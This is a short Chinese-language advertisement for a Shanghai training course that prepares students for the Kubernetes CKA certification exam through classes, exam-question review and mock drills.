本次培训在上海开班,基于最新考纲,通过线下授课、考题解读、模拟演练等方式,帮助学员快速掌握Kubernetes的理论知识和专业技能,并针对考试做特别强化训练,让学员能从容面对CKA认证考试,使学员既能掌握Kubernetes相关知识,又能通过CKA认证考试,学员可多次参加培训,直到通过认证。点击下方图片或者阅读原文链接查看详情。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。